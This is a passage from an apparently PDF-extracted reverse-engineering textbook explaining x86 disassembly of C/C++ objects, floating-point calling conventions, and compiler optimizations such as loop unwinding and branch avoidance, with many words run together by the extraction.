it’s needed. Figure 3shows how to offset a pointer to
retrievevariables.
;abc123 = pointer to object mov eax, [abc123] ;eax =
&a ;offset = abc123+0*word_size = abc123 mov ebx,
[abc123+4] ;ebx = &b ;offset = abc123+2*word_size
= abc123+4 mov ecx, [abc123+8] ;ecx = &c ;offset =
abc123+4*word_size=abc123+8
60 CHAPTER 4. DATA PATTERNS
Figure3: This shows how to offset a pointer to retrieve
variables. Thefirstlineplacestheaddressofvariable'a'
into eax. The second line places the address of variable
'b' into ebx. And the last line places the variable 'c' into
ecx.
Methods
At a low level, there is almost no difference between a
functionandamethod. Whendecompiling,itcansome-
timesbehardtotelladifferencebetweenthetwo. They
bothresideinthetextmemoryspace,andbotharecalled
thesameway. Anexampleofhowamethodiscalledcan
beseeninFigure4.
A:
//methodcallabc123->foo(1,2,3);
B:
push 3 ; int c push 2 ; int b push 1 ; int a push [ebp-4] ;
theaddressoftheobjectcall0x00434125;calltomethod
A notable characteristic in a method call is the address
oftheobjectbeingpassedinasanargument. This,how-
ever, is not a always a good indicator. Figure5shows
function with the first argument being an object passed
inbyreference. Theresultisfunctionthatlooksidentical
toamethodcall.
A:
//functioncallfoo(abc123,1,2,3);
B:
push 3 ; int c push 2 ; int b push 1 ; int a push [ebp+4]
; the address of the object call 0x00498372 ; call to
function
Inheritance&Polymorphism
Inheritance and polymorphism completely changes the
structure of a class, the object no longer contains just
variables,theyalsocontainpointerstotheinheritedmeth-
ods. This is due to the fact that polymorphism requires
theaddressofamethodorinnerobjecttobefiguredout
atruntime.
TakeFigure6into consideration. How does the appli-
cationknowtocallD::oneorC::one? Theansweristhat
the compiler figures out a convention in which to order
variablesandmethodpointersinsidetheobjectsuchthat
whenthey'rereferenced,theoffsetsarethesameforany
objectthathasinheriteditsmethodsandvariables.TheabstractclassAactsasablueprintforthecompiler,
defining an expected structure for any class that inherits
it. Every variable defined in class A and every virtual
method defined in A will have the exact same offset for
any of its children. Figure7declares a possible inheri-
tance scheme as well as it structure in memory. Notice
how the offset to C::one is the same as D::one, and the
offsettoC’scopyofA::aisthesameasD’scopy. Inthis,
our polymorphic loop can just iterate through the array
ofpointersandknowexactlywheretofindeachmethod.
A:
classA{public: inta; virtualvoidone()=0; }; classB{
public: int b; int c; virtual void two() = 0; }; class C:
publicA{public: intd; voidone(); }; classD:publicA,
publicB{public: inte;voidone();voidtwo();};
B:
;Object C 0x00200000 dd 0x00423848 ; address of
C::one ;offset = 0*word_size 0x00200004 dd 1 ; C’s
copy of A::a ;offset = 2*word_size 0x00200008 dd 4 ;
C::d ;offset = 4*word_size ;Object D 0x00200100 dd
0x00412348 ; address of D::one ;offset = 0*word_size
0x00200104dd1;D’scopyofA::a;offset=2*word_size
0x00200108 dd 0x00431255 ; address of D::two ;offset
= 4*word_size 0x0020010C dd 2 ; D’s copy of B::b
;offset = 6*word_size 0x00200110 dd 3 ; D’s copy of
B::c ;offset = 8*word_size 0x00200114 dd 5 ; D::e
;offset=10*word_size
4.4.3 ClassesVs.Structs
4.5 FloatingPointNumbers
4.5.1 FloatingPointNumbers
This page will talk about how floating point numbers
areusedinassemblylanguageconstructs. Thispagewill
not talk about new constructs, it will not explain what
theFPUinstructionsdo,howfloatingpointnumbersare
storedormanipulated,orthedifferencesinfloating-point
data representations. However, this page will demon-
stratebrieflyhowfloating-pointnumbersareusedincode
anddatastructuresthatwehavealreadyconsidered.
Thex86architecturedoesnothaveanyregistersspecifi-
callyforfloatingpointnumbers,butitdoeshaveaspecial
stack for them. The floating point stack is built directly
intotheprocessor,andhasaccessspeedssimilartothose
ofordinaryregisters. NoticethattheFPUstackisnotthe
sameastheregularsystemstack.
4.5. FLOATING POINT NUMBERS 61
4.5.2 CallingConventions
With the addition of the floating-point stack, there is an
entirely new dimension for passing parameters and re-
turningvalues. Wewillexamineourcallingconventions
here, and see how they are affected by the presence of
floating-point numbers. These are the functions that we
willbeassembling,usingbothGCC,andcl.exe:
__cdecl double MyFunction1(double x, double y, float
z){ return(x + 1.0) * (y + 2.0)* (z + 3.0); } __fastcall
doubleMyFunction2(doublex,doubley,floatz){return
(x + 1.0) * (y + 2.0) * (z + 3.0); } __stdcall double
MyFunction3(double x, double y, float z) { return (x +
1.0)*(y+2.0)*(z+3.0);}
CDECL
Hereisthecl.exeassemblylistingforMyFunction1:
PUBLIC _MyFunction1 PUBLIC
__real@3ff0000000000000 PUBLIC
__real@4000000000000000 PUBLIC
__real@4008000000000000 EXTRN __fl-
tused:NEAR ; COMDAT __real@3ff0000000000000
CONST SEGMENT __real@3ff0000000000000
DQ 03ff0000000000000r ; 1 CONST ENDS ;
COMDAT __real@4000000000000000 CONST
SEGMENT __real@4000000000000000 DQ
04000000000000000r ; 2 CONST ENDS ; COM-
DAT __real@4008000000000000 CONST SEGMENT
__real@4008000000000000DQ04008000000000000r
;3CONSTENDS_TEXTSEGMENT_x$=8;size=
8_y$=16; size=8_z$=24; size=4_MyFunction1
PROC NEAR ; Line 2 push ebp mov ebp, esp ; Line
3 fld QWORD PTR _x$[ebp] fadd QWORD PTR
__real@3ff0000000000000fldQWORDPTR_y$[ebp]
fadd QWORD PTR __real@4000000000000000 fmulp
ST(1),ST(0)fldDWORDPTR_z$[ebp]faddQWORD
PTR __real@4008000000000000 fmulp ST(1), ST(0)
; Line 4 pop ebp ret 0 _MyFunction1 ENDP _TEXT
ENDS
Our first question is this: are the parameters passed on
thestack,oronthefloating-pointregisterstack,orsome
placedifferententirely? Keytothisquestion,andtothis
function is a knowledge of what fldandfstpdo. fld
(Floating-point Load) pushes a floating point value onto
theFPUstack,whilefstp(Floating-PointStoreandPop)
movesafloatingpointvaluefromST0tothespecifiedlo-
cation,andthenpopsthevaluefromST0offthestacken-
tirely. Rememberthat doublevaluesincl.exearetreated
as 8-byte storage locations (QWORD), while floats are
onlystoredas4-bytequantities(DWORD).Itisalsoim-
portant to remember that floating point numbers are not
storedinahuman-readableforminmemory,evenifthe
readerhasasolidknowledgeofbinary. Remember,thesearen't integers. Unfortunately, the exact format of float-
ingpointnumbersiswellbeyondthescopeofthischap-
ter.
x is offset +8, y is offset +16, and z is offset +24 from
ebp. Therefore,zispushedfirst,xispushedlast,andthe
parameters are passed right-to-left on the regular stack
not the floating point stack. To understand how a value
is returnedhowever, weneedto understand what fmulp
does. fmulpisthe“Floating-PointMultiplyandPop”in-
struction. Itperformstheinstructions:
ST1:=ST1*ST0FPUPOPST0
This multiplies ST(1) and ST(0) and stores the result in
ST(1). Then, ST(0) is marked empty and stack pointer
is incremented. Thus, contents of ST(1) are on the top
ofthestack. Sothetop2valuesaremultipliedtogether,
andtheresultisstoredonthetopofthestack. Therefore,
inourinstructionabove,“fmulpST(1),ST(0)",whichis
also the last instruction of the function, we can see that
the last result is stored in ST0. Therefore, floating point
parameters are passed on the regular stack, but floating
pointresultsarepassedontheFPUstack.
OnefinalnoteisthatMyFunction2cleansitsownstack,
asreferencedbythe ret20commandattheendofthelist-
ing. Becausenoneoftheparameterswerepassedinreg-
isters,thisfunctionappearstobeexactlywhatwewould
expectanSTDCALLfunctionwouldlooklike: parame-
terspassedonthestackfromright-to-left, andthefunc-
tion cleans its own stack. We will see below that this is
actuallyacorrectassumption.
Forcomparison,hereistheGCClisting:
LC1: .long 0 .long 1073741824 .align 8 LC2: .long
0 .long 1074266112 .globl _MyFunction1 .def _My-
Function1; .scl2; .type32; .endef_MyFunction1: pushl
%ebp movl %esp, %ebp subl $16, %esp fldl 8(%ebp)
fstpl 8(%ebp) fldl 16(%ebp) fstpl  16(%ebp) fldl
 8(%ebp) fld1 faddp %st, %st(1) fldl  16(%ebp) fldl
LC1faddp%st,%st(1)fmulp%st,%st(1)flds24(%ebp)
fldl LC2 faddp %st, %st(1) fmulp %st, %st(1) leave ret
.align8
This is a very difficult listing, so we will step through it
(albeit quickly). 16 bytes of extra space is allocated on
the stack. Then, using a combination of fldl and fstpl
instructions, the first 2 parameters are moved from off-
sets+8and+16,tooffsets  8and 16fromebp. Seems
likeawasteoftime,butremember,optimizationsareoff.
fld1loadsthefloatingpointvalue1.0ontotheFPUstack.
faddpthenaddsthetopofthestack(1.0),tothevaluein
ST1([ebp-8],originally[ebp+8]).
FASTCALL
Hereisthecl.exelistingforMyFunction2:
PUBLIC @MyFunction2@20 PUB-
62 CHAPTER 4. DATA PATTERNS
LIC __real@3ff0000000000000 PUB-
LIC __real@4000000000000000 PUBLIC
__real@4008000000000000 EXTRN __fl-
tused:NEAR ; COMDAT __real@3ff0000000000000
CONST SEGMENT __real@3ff0000000000000
DQ 03ff0000000000000r ; 1 CONST ENDS ;
COMDAT __real@4000000000000000 CONST
SEGMENT __real@4000000000000000 DQ
04000000000000000r ; 2 CONST ENDS ; COM-
DAT __real@4008000000000000 CONST SEGMENT
__real@4008000000000000DQ04008000000000000r
; 3 CONST ENDS _TEXT SEGMENT _x$ = 8 ; size
= 8 _y$ = 16 ; size = 8 _z$ = 24 ; size = 4 @MyFunc-
tion2@20PROCNEAR;Line7pushebpmovebp,esp
;Line8fldQWORDPTR_x$[ebp]faddQWORDPTR
__real@3ff0000000000000fldQWORDPTR_y$[ebp]
fadd QWORD PTR __real@4000000000000000 fmulp
ST(1),ST(0)fldDWORDPTR_z$[ebp]faddQWORD
PTR __real@4008000000000000 fmulp ST(1), ST(0) ;
Line9popebpret20;00000014H@MyFunction2@20
ENDP_TEXTENDS
Wecanseethatthisfunctionistaking20bytesworthof
parameters,becauseofthe@20decorationattheendof
thefunctionname. Thismakessense, becausethefunc-
tionistakingtwo doubleparameters(8byteseach),and
onefloatparameter (4 bytes each). This is a grand to-
tal of 20 bytes. We can notice at a first glance, without
havingtoactuallyanalyzeorunderstandanyofthecode,
that there is only one register being accessed here: ebp.
Thisseemsstrange,consideringthatFASTCALLpasses
itsregular32-bitargumentsinregisters. However,thatis
notthecasehere: allthefloating-pointparameters(even
z, which is a 32-bit float) are passed on the stack. We
know this, because by looking at the code, there is no
otherplacewheretheparameterscouldbecomingfrom.
Notice also that fmulpis the last instruction performed
again, as it was in the CDECL example. We can infer
then, without investigating too deeply, that the result is
passedatthetopofthefloating-pointstack.
Noticealsothatx(offset[ebp+8]),y(offset[ebp+16])
and z (offset [ebp + 24]) are pushed in reverse order: z
is first, x is last. This means that floating point parame-
tersarepassedinright-to-leftorder,onthestack. Thisis
exactlythesameasCDECLcode,althoughonlybecause
weareusingfloating-pointvalues.
HereistheGCCassemblylistingforMyFunction2:
.align 8 LC5: .long 0 .long 1073741824 .align 8 LC6:
.long 0 .long 1074266112 .globl @MyFunction2@20
.def @MyFunction2@20; .scl 2; .type 32; .endef @My-
Function2@20: pushl %ebp movl %esp, %ebp subl
$16, %esp fldl 8(%ebp) fstpl  8(%ebp) fldl 16(%ebp)
fstpl 16(%ebp) fldl  8(%ebp) fld1 faddp %st, %st(1)
fldl 16(%ebp) fldl LC5 faddp %st, %st(1) fmulp %st,
%st(1) flds 24(%ebp) fldl LC6 faddp %st, %st(1) fmulp
%st,%st(1)leaveret$20Thisisatrickypieceofcode,butluckilywedon'tneedto
readitveryclosetofindwhatwearelookingfor. Firstoff,
notice that no other registers are accessed besides ebp.
Again,GCCpassesallfloatingpointvalues(eventhe32-
bit float, z) on the stack. Also, the floating point result
valueispassedonthetopofthefloatingpointstack.
WecanseeagainthatGCCisdoingsomethingstrangeat
the beginning, taking the values on the stack from [ebp
+ 8] and [ebp + 16], and moving them to locations [ebp
- 8] and [ebp - 16], respectively. Immediately after be-
ingmoved,thesevaluesareloadedontothefloatingpoint
stackandarithmeticisperformed. zisn'tloadedtilllater,
andisn'tevermovedto[ebp-24],despitethepattern.
LC5 and LC6 are constant values, that most likely rep-
resent floating point values (because the numbers them-
selves, 1073741824 and 1074266112 don't make any
sense in the context of our example functions. Notice
though that both LC5 and LC6 contain two .longdata
items, for a total of 8 bytes of storage? They are there-
foremostdefinitely doublevalues.
STDCALL
Hereisthecl.exelistingforMyFunction3:
PUBLIC _MyFunction3@20 PUB-
LIC __real@3ff0000000000000 PUB-
LIC __real@4000000000000000 PUBLIC
__real@4008000000000000 EXTRN __fl-
tused:NEAR ; COMDAT __real@3ff0000000000000
CONST SEGMENT __real@3ff0000000000000
DQ 03ff0000000000000r ; 1 CONST ENDS ;
COMDAT __real@4000000000000000 CONST
SEGMENT __real@4000000000000000 DQ
04000000000000000r ; 2 CONST ENDS ; COM-
DAT __real@4008000000000000 CONST SEGMENT
__real@4008000000000000DQ04008000000000000r
;3CONSTENDS_TEXTSEGMENT_x$=8;size=8
_y$=16;size=8_z$=24;size=4_MyFunction3@20
PROC NEAR ; Line 12 push ebp mov ebp, esp ; Line
13 fld QWORD PTR _x$[ebp] fadd QWORD PTR
__real@3ff0000000000000fldQWORDPTR_y$[ebp]
fadd QWORD PTR __real@4000000000000000 fmulp
ST(1),ST(0)fldDWORDPTR_z$[ebp]faddQWORD
PTR __real@4008000000000000 fmulp ST(1), ST(0) ;
Line14popebpret20;00000014H_MyFunction3@20
ENDP_TEXTENDSEND
x is the highest on the stack, and z is the lowest, there-
fore these parameters are passed from right-to-left. We
cantellthisbecausexhasthesmallestoffset(offset[ebp
+ 8]), while z has the largest offset (offset [ebp + 24]).
We see also from the final fmulp instruction that the re-
turnvalueispassedontheFPUstack. Thisfunctionalso
cleans the stack itself, as noticed by the call ' ret 20. It
4.6. FLOATING POINT EXAMPLES 63
is cleaning exactly 20 bytes off the stack which is, inci-
dentally, the total amount that we passed to begin with.
Wecanalsonoticethattheimplementationofthisfunc-
tion looks exactly like the FASTCALL version of this
function. This is true because FASTCALL only passes
DWORD-sizedparametersinregisters,andfloatingpoint
numbersdonotqualify. Thismeansthatourassumption
abovewascorrect.
HereistheGCClistingforMyFunction3:
.align 8 LC9: .long 0 .long 1073741824 .align 8 LC10:
.long 0 .long 1074266112 .globl @MyFunction3@20
.def @MyFunction3@20; .scl 2; .type 32; .endef @My-
Function3@20: pushl %ebp movl %esp, %ebp subl
$16, %esp fldl 8(%ebp) fstpl  8(%ebp) fldl 16(%ebp)
fstpl 16(%ebp) fldl  8(%ebp) fld1 faddp %st, %st(1)
fldl 16(%ebp) fldl LC9 faddp %st, %st(1) fmulp %st,
%st(1)flds24(%ebp)fldlLC10faddp%st,%st(1)fmulp
%st,%st(1)leaveret$20
Herewecanalsosee,afteralltheopeningnonsense,that
[ebp - 8] (originally [ebp + 8]) is value x, and that [ebp
-24](originally[ebp-24])isvaluez. Theseparameters
are therefore passed right-to-left. Also, we can deduce
from the final fmulp instruction that the result is passed
in ST0. Again, the STDCALL function cleans its own
stack,aswewouldexpect.
Conclusions
Floating point values are passed as parameters on the
stack,andarepassedontheFPUstackasresults. Float-
ing point values do not get put into the general-purpose
integer registers (eax, ebx, etc...), so FASTCALL func-
tions that only have floating point parameters collapse
into STDCALL functions instead. doublevalues are
8-bytes wide, and therefore will take up 8-bytes on the
stack.floatvalueshowever,areonly4-byteswide.
4.5.3 FloattoIntConversions
4.5.4 FPUComparesandJumps
4.6 FloatingPointExamples
4.6.1 Example:FloatingPointArithmetic
Here is the C source code, and the GCC assembly list-
ingofasimpleClanguagefunctionthatperformssimple
floating-point arithmetic. Can you determine what the
numericalvaluesofLC5andLC6are?
__fastcalldoubleMyFunction2(doublex, doubley, floatz){return(x+1.0)*(y+2.0)*(z+3.0);}
.align 8 LC5: .long 0 .long 1073741824 .align 8 LC6:
.long 0 .long 1074266112 .globl @MyFunction2@20
.def @MyFunction2@20; .scl 2; .type 32; .endef @My-
Function2@20: pushl %ebp movl %esp, %ebp subl
$16, %esp fldl 8(%ebp) fstpl  8(%ebp) fldl 16(%ebp)
fstpl 16(%ebp) fldl  8(%ebp) fld1 faddp %st, %st(1)
fldl 16(%ebp) fldl LC5 faddp %st, %st(1) fmulp %st,
%st(1) flds 24(%ebp) fldl LC6 faddp %st, %st(1) fmulp
%st,%st(1)leaveret$20
Forthis,wedon'tevenneedafloating-pointnumbercal-
culator,althoughyouarefreetouseoneifyouwish(and
ifyoucanfindagoodone). LC5isaddedto[ebp-16],
whichweknowtobey,andLC6isaddedto[ebp-24],
which we know to be z. Therefore, LC5 is the number
“2.0”,andLC6isthenumber“3.0”. Noticethatthe fld1
instruction automatically loads the top of the floating-
pointstackwiththeconstantvalue“1.0”.
Chapter5
Difficulties
5.1 CodeOptimization
5.1.1 CodeOptimization
Anoptimizingcompiler isperhapsoneofthemostcom-
plicated,mostpowerful,andmostinterestingprogramsin
existence. Thischapterwilltalkaboutoptimizations,al-
though this chapter will not include a table of common
optimizations.
5.1.2 StagesofOptimizations
There are two times when a compiler can perform opti-
mizations: first, in the intermediate representation, and
second,duringthecodegeneration.
IntermediateRepresentationOptimizations
Whileintheintermediaterepresentation,acompilercan
perform various optimizations, often based on dataflow
analysistechniques. Forexample,considerthefollowing
codefragment:
x=5;if(x!=5){//loopbody}
Anoptimizingcompilermightnoticethatatthepointof
“if (x != 5)", the value of x is always the constant “5”.
This allows substituting “5” for x resulting in “5 != 5”.
Then the compiler notices that the resulting expression
operatesentirelyonconstants,sothevaluecanbecalcu-
lated now instead of at run time, resulting in optimizing
the conditional to “if (false)". Finally the compiler sees
that this means the body of the if conditional will never
beexecuted,soitcanomittheentirebodyoftheifcon-
ditionalaltogether.
Considerthereversecase:
x=5;if(x==5){//loopbody}
In this case, the optimizing compiler would notice that
the IF conditional will always be true, and it won't evenbotherwritingcodetotestx.
ControlFlowOptimizations
Anothersetofoptimizationwhichcanbeperformedei-
therattheintermediateoratthecodegenerationlevelare
control flow optimizations. Most of these optimizations
deal with the elimination of useless branches. Consider
thefollowingcode:
if(A){if(B){C;}else{D;}end_B:}else{E;}end_A:
Inthiscode,asimplisticcompilerwouldgenerateajump
fromtheCblocktoend_B,andthenanotherjumpfrom
end_Btoend_A(togetaroundtheEstatements). Clearly
jumpingtoajumpisinefficient,sooptimizingcompilers
willgenerateadirectjumpfromblockCtoend_A.
Thisunfortunatelywillmakethecodemoreconfusedand
will prevent a nice recovery of the original code. For
complexfunctions,it’spossiblethatonewillhavetocon-
siderthecodemadeofonlyif()-goto;sequences,without
being able to identify higher level statements like if-else
orloops.
The process of identifying high level statement hierar-
chiesiscalled“codestructuring”.
CodeGenerationOptimizations
Once the compiler has sifted through all the logical in-
efficiencies in your code, the code generator takes over.
Often the code generator will replace certain slow ma-
chineinstructionswithfastermachineinstructions.
Forinstance,theinstruction:
beginning: ... loopnzbeginning
operates muchslowerthantheequivalentinstructionset:
beginning: ... dececxjnebeginning
Sothenwhywouldacompilereverusealoopxxinstruc-
tion? Theansweristhatmostoptimizingcompilersnever
usealoopxxinstruction,andthereforeasareverser,you
64
5.2. OPTIMIZATION EXAMPLES 65
willprobablyneverseeoneusedinrealcode.
Whatabouttheinstruction:
moveax,0
Themovinstructionisrelativelyquick,butafasterpartof
the processor is the arithmetic unit. Therefore, it makes
moresensetousethefollowinginstruction:
xoreax,eax
because xor operates in very few processor cycles (and
savesthreebytesatthesametime),andisthereforefaster
thana“moveax,0”. Theonlydrawbackofaxorinstruc-
tion is that it changes the processor flags, so it cannot
be used between a comparison instruction and the cor-
respondingconditionaljump.
5.1.3 LoopUnwinding
Whenaloopneedstorunforasmall,butdefinitenumber
ofiterations,itisoftenbetterto unwindtheloop inor-
dertoreducethenumberofjumpinstructionsperformed,
andinmanycasespreventtheprocessor’sbranchpredic-
tor from failing. Consider the following C loop, which
callsthefunctionMyFunction()5times:
for(x=0;x<5;x++){MyFunction();}
Converting to assembly, we see that this becomes,
roughly:
mov eax, 0 loop_top: cmp eax, 5 jge loop_end call
_MyFunctioninceaxjmploop_toploop_end:
Each loop iteration requires the following operations to
beperformed:
1.Comparethevalueineax(thevariable“x”)to5,and
jumptotheendifgreaterthenorequal
2.Incrementeax
3.Jumpbacktothetopoftheloop.
Noticethatweremovealltheseinstructionsifwemanu-
allyrepeatourcalltoMyFunction():
call _MyFunction call _MyFunction call _MyFunction
call_MyFunctioncall_MyFunction
This new version not only takes up less disk space be-
cause it uses fewer instructions, but also runs faster be-
cause fewer instructions are executed. This process is
calledLoopUnwinding .5.1.4 InlineFunctions
TheCandC++languagesallowthedefinitionofaninline
typeoffunction. Inlinefunctionsarefunctionswhichare
treatedsimilarlytomacros. Duringcompilation,callsto
aninlinefunctionarereplacedwiththebodyofthatfunc-
tion,insteadofperformingacallinstruction. Inaddition
tousingtheinlinekeywordtodeclareaninlinefunction,
optimizingcompilersmaydecidetomakeotherfunctions
inlineaswell.
Function inlining works similarly to loop unwinding for
increasing code performance. A non-inline function re-
quires a call instruction, several instructions to create a
stackframe,andthenseveralmoreinstructionstodestroy
thestackframeandreturnfromthefunction. Bycopying
thebodyofthefunctioninsteadofmakingacall,thesize
ofthemachinecodeincreases,buttheexecutiontime de-
creases.
It is not necessarily possible to determine whether iden-
tical portions of code were created originally as macros,
inline functions, or were simply copy and pasted. How-
ever,whendisassemblingitcanmakeyourworkeasierto
separatetheseblocksoutintoseparateinlinefunctions,to
helpkeepthecodestraight.
5.2 OptimizationExamples
5.2.1 Example: Optimized vs Non-
OptimizedCode
Thefollowingexampleisadaptedfromanalgorithmpre-
sented in Knuth(vol 1, chapt 1) used to find the greatest
common denominator of 2 integers. Compare the list-
ingfileofthisfunctionwhencompileroptimizationsare
turnedonandoff.
/*line 1*/ int EuclidsGCD(int m, int n) /*we want to
findtheGCDofmandn*/{intq,r;/*qisthequotient,
r is the remainder*/ while(1) { q = m / n; /*find q and
r*/r=m%n;if(r==0)/*ifris0,returnournvalue*/
{ return n; } m = n; /*set m to the current n value*/ n
=r;/*setntoourcurrentremaindervalue*/}/*repeat*/}
CompilingwiththeMicrosoftCcompiler,wegeneratea
listingfileusingnooptimization:
PUBLIC _EuclidsGCD _TEXT SEGMENT _r$ =  8
; size = 4 _q$ =  4 ; size = 4 _m$ = 8 ; size = 4 _n$
= 12 ; size = 4 _EuclidsGCD PROC NEAR ; Line 2
push ebp mov ebp, esp sub esp, 8 $L477: ; Line 4 mov
eax, 1 test eax, eax je SHORT $L473 ; Line 6 mov
eax, DWORD PTR _m$[ebp] cdq idiv DWORD PTR
_n$[ebp]movDWORDPTR_q$[ebp],eax;Line7mov
eax, DWORD PTR _m$[ebp] cdq idiv DWORD PTR
66 CHAPTER 5. DIFFICULTIES
_n$[ebp]movDWORDPTR_r$[ebp],edx;Line8cmp
DWORDPTR_r$[ebp],0jneSHORT$L479;Line10
mov eax, DWORD PTR _n$[ebp] jmp SHORT $L473
$L479: ; Line 12 mov ecx, DWORD PTR _n$[ebp]
mov DWORD PTR _m$[ebp], ecx ; Line 13 mov edx,
DWORD PTR _r$[ebp] mov DWORD PTR _n$[ebp],
edx;Line14jmpSHORT$L477$L473: ;Line15mov
esp, ebp pop ebp ret 0 _EuclidsGCD ENDP _TEXT
ENDSEND
Noticehowthereisaveryclearcorrespondencebetween
the lines of C code, and the lines of the ASM code. the
additionofthe";linex”directivesisveryhelpfulinthat
respect.
Next,wecompilethesamefunctionusingaseriesofop-
timizationstostressspeedoversize:
cl.exe/Tceuclids.c/Fa/Ogt2
andweproducethefollowinglisting:
PUBLIC _EuclidsGCD _TEXT SEGMENT _m$ = 8
; size = 4 _n$ = 12 ; size = 4 _EuclidsGCD PROC
NEAR ; Line 7 mov eax, DWORD PTR _m$[esp-4]
push esi mov esi, DWORD PTR _n$[esp] cdq idiv
esi mov ecx, edx ; Line 8 test ecx, ecx je SHORT
$L563 $L547: ; Line 12 mov eax, esi cdq idiv ecx ;
Line 13 mov esi, ecx mov ecx, edx test ecx, ecx jne
SHORT $L547 $L563: ; Line 10 mov eax, esi pop esi
;Line15ret0_EuclidsGCDENDP_TEXTENDSEND
As you can see, the optimized version is significantly
shorterthenthenon-optimizedversion. Someofthekey
differencesinclude:
The optimized version does not prepare a standard
stack frame. This is important to note, because
manytimesnewreversersassumethatfunctionsal-
waysstartandendwithproperstackframes,andthis
isclearlynotthecase. EBPisntbeingused,ESPisnt
beingaltered(becausethelocalvariablesarekeptin
registers,andnotputonthestack),andnosubfunc-
tionsarecalled. 5instructionsarecutbythis.
The “test EAX, EAX” series of instructions in the
non-optimized output, under ";line 4” is all unnec-
essary. Thewhile-loopisdefinedby“while(1)"and
thereforetheloopalwayscontinues. thisextracode
issafelycutout. Noticealsothatthereisnouncon-
ditional jump in the loop like would be expected:
the“if(r==0)returnn;"instructionhasbecomethe
newloopcondition.
The structure of the function is altered greatly: the
divisionofmandntoproduceqandrisperformed
in this function twice: once at the beginning of the
function to initialize, and once at the end of the
loop. Also, the value of r is tested twice, in the
sameplaces. Thecompilerisveryliberalwithhowitassignsstorageinthefunction,andreadilydiscards
valuesthatarenotneeded.
5.2.2 Example:ManualOptimization
Thefollowinglinesofassemblycodearenotoptimized,
buttheycanbeoptimizedveryeasily. Canyoufindaway
tooptimizetheselines?
moveax,1testeax,eaxjeSHORT$L473
Thecodeinthislineisthecodegeneratedforthe“while(
1)"Ccode,tobeexact,itrepresentstheloopbreakcon-
dition. Because this is an infinite loop, we can assume
thattheselinesareunnecessary.
“moveax,1”initializeseax.
the test immediately afterwards tests the value of eax
to ensure that it is nonzero. because eax will always be
nonzero(eax=1)atthispoint,theconditionaljumpcan
beremovedalongwhiththe“mov”andthe“test”.
The assembly is actually checking whether 1 equals 1.
Anotherfactis,thattheCcodeforaninfinite FORloop:
for(;;){... }
wouldnotcreatesuchameaninglessassemblycodetobe-
ginwith,andislogicallythesameas“while(1)".
5.2.3 Example:TraceVariables
Here are the C code and the optimized assembly listing
fromtheEuclidGCDfunction, fromtheexampleabove.
Can you determine which registers contain the variables
randq?
/*line1*/intEuclidsGCD(intm,intn)/*wewanttofind
theGCDofmandn*/{intq,r;/*qisthequotient,ris
the remainder*/ while(1) { q = m / n; /*find q and r*/
r = m % n; if(r == 0) /*if r is 0, return our n value*/ {
returnn;}m=n;/*setmtothecurrentnvalue*/n=r;
/*setntoourcurrentremaindervalue*/}/*repeat*/}
PUBLIC _EuclidsGCD _TEXT SEGMENT _m$ = 8
; size = 4 _n$ = 12 ; size = 4 _EuclidsGCD PROC
NEAR ; Line 7 mov eax, DWORD PTR _m$[esp-4]
push esi mov esi, DWORD PTR _n$[esp] cdq idiv
esi mov ecx, edx ; Line 8 test ecx, ecx je SHORT
$L563 $L547: ; Line 12 mov eax, esi cdq idiv ecx ;
Line 13 mov esi, ecx mov ecx, edx test ecx, ecx jne
SHORT $L547 $L563: ; Line 10 mov eax, esi pop esi
;Line15ret0_EuclidsGCDENDP_TEXTENDSEND
Atthebeginningofthefunction, eaxcontainsm,and esi
contains n. When the instruction “idiv esi” is executed,
eax contains the quotient (q), and edx contains the re-
mainder(r). Theinstruction“movecx,edx”movesrinto
ecx, while q is not used for the rest of the loop, and is
5.3. CODE OBFUSCATION 67
thereforediscarded.
5.2.4 Example: Decompile Optimized
Code
BelowistheoptimizedlistingfileoftheEuclidGCDfunc-
tion, presented in the examples above. Can you decom-
pilethisassemblycodelistingintoequivalent“optimized”
Ccode? Howistheoptimizedversiondifferentinstruc-
turefromthenon-optimizedversion?
PUBLIC _EuclidsGCD _TEXT SEGMENT _m$ = 8
; size = 4 _n$ = 12 ; size = 4 _EuclidsGCD PROC
NEAR ; Line 7 mov eax, DWORD PTR _m$[esp-4]
push esi mov esi, DWORD PTR _n$[esp] cdq idiv
esi mov ecx, edx ; Line 8 test ecx, ecx je SHORT
$L563 $L547: ; Line 12 mov eax, esi cdq idiv ecx ;
Line 13 mov esi, ecx mov ecx, edx test ecx, ecx jne
SHORT $L547 $L563: ; Line 10 mov eax, esi pop esi
;Line15ret0_EuclidsGCDENDP_TEXTENDSEND
Altering the conditions to maintain the same structure
givesus:
int EuclidsGCD(int m, int n) { int r; r = m % n; if(r !=
0){do{m=n;r=m%r;n=r;}while(r!=0)}return
n;}
It is up to the reader to compile this new “optimized” C
code,anddetermineifthereisanyperformanceincrease.
Trycompilingthisnewcodewithoutoptimizationsfirst,
andthenwithoptimizations. Comparethenewassembly
listingstothepreviousones.
5.2.5 Example:InstructionPairings
QWhydoesthe dec/jnecombooperatefasterthanthe
equivalentloopnz?
AThedec/jnzpairoperatesfasterthena loopszforsev-
eralreasons. First, decandjnzpairupinthediffer-
entmodulesofthenetburstpipeline,sotheycanbe
executedsimultaneously. Topthatoffwiththefact
thatdecandjnzbothrequirefewcyclestoexecute,
while theloopnz(and all the loop instructions, for
that matter) instruction takes more cycles to com-
plete. loop instructions are rarely seen output by
goodcompilers.
5.2.6 Example:AvoidingBranches
Belowisanassemblyversionoftheexpressionc? d: 0.
Thereisnobranchinginthecode,sohowdoesitwork?
;ecx=candedx=d;eaxwillcontainc? d: 0(eax=d
if c is notzero, otherwiseeax = 0) negecx sbbeax, eaxandeax,edxret
This is an example of using various arithmetic instruc-
tions to avoid branching. The neginstruction sets the
carry flag if cis not zero; otherwise, it clears the carry
flag. The next line depends on this. If the carry flag is
set, thensbbresults in eax = eax - eax - 1 = 0xffffffff.
Otherwise, eax = eax - eax = 0. Finally, performing an
andonthisresultensuresthatif ecxwasnotzerointhe
firstplace,eaxwillcontainedx,andzerootherwise.
5.2.7 Example:Duff’sDevice
WhatdoesthefollowingCcodefunctiondo? Isituseful?
Whyorwhynot?
void MyFunction(int *arrayA, int *arrayB, int cnt) {
switch(cnt%6){while(cnt!=0){case0: arrayA[--cnt]
= arrayB[cnt]; case 5: arrayA[--cnt] = arrayB[cnt]; case
4: arrayA[--cnt] = arrayB[cnt]; case 3: arrayA[--cnt] =
arrayB[cnt];case2: arrayA[--cnt]=arrayB[cnt];case1:
arrayA[--cnt]=arrayB[cnt];}}}
Thispieceofcodeisknownasa Duff’sdevice or“Duff’s
machine”. It is used to partially unwind a loop for effi-
ciency. Noticethestrangewaythatthewhile()isnested
